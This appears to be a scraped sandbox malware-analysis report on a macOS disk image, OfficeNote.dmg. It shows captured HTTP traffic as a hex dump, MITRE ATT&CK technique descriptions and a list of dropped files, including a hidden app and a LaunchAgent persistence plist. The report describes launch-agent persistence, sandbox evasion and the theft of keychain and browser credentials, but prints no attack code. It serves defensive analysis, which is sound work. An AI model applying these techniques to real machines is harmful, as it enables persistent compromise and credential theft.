2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 23 Aug 2023 12:56:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Wed, 23 Aug 2023 12:56:38 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H5wCGlafP7oKiXclCcCQ1Uo%2B4MRlMjAlBqW8k2O5FbUFTMW36tUu1HRXrS40%2FUT%2F6azXMGKNKbbdUfZVTqGEXd4GZ%2BuH5Rn0OpEUKd8z7v6SWf6O0VRRLiGNCpT%2FVvTaWCRr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 7fb383e81d5e30ee-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 Data Ascii: 11a4<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in `/System/Library/LaunchAgents` , `/Library/LaunchAgents` , and `$HOME/Library/LaunchAgents` . These launch agents have property list files which point to the executables that will be launched . Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories . The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in . They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as `/Library/Preferences` (which execute with elevated privileges) and `~/Library/Preferences` (which execute with a user's privileges).
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificates used during an operation may be created, acquired, or stolen by the adversary. Unlike Invalid Code Signature , this activity will result in a valid signature.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: Bypass User Access Control ).
Tactics:	Collection, Credential Access
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, User interface
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in `~/Library/Keychains/` , `/Library/Keychains/` , and `/Network/Library/Keychains/` . The `security` command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.
Tactics:	Credential Access
Data Sources:	API monitoring, File monitoring, PowerShell logs, Process monitoring, System calls
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may acquire credentials from web browsers by reading files specific to the target browser.Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.
Tactics:	Credential Access
Data Sources:	API monitoring, File monitoring, PowerShell logs, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

macOS Analysis Report OfficeNote.dmg

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Dropped Files

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

E-Banking Fraud

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Created / dropped Files

/Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/Info.plist

/Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps

/Users/rodrigo/73a470tO

/Users/rodrigo/Library/LaunchAgents/com.CdoPv.wvz4oTFps.plist

/Users/rodrigo/obdL0Dl8

/private/var/folders/lz/nsqjk8n92l30_9hwqkbhfpym0000gp/C/mds/mdsDirectory.db_

/private/var/folders/lz/nsqjk8n92l30_9hwqkbhfpym0000gp/C/mds/mdsObject.db_

Static File Info

General

CodeSign Information

Archive DMG

Archived Files

Extracted Files

OfficeNote/.DS_Store

OfficeNote/.VolumeIcon.icns

OfficeNote/OfficeNote.app/Contents/Info.plist

Plist Content

OfficeNote/OfficeNote.app/Contents/MacOS/OfficeNote

Static Mach Info

General Information for header 1

Internal Symbols

External Symbols

OfficeNote/OfficeNote.app/Contents/_CodeSignature/CodeResources

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

macOS Analysis Report
OfficeNote.dmg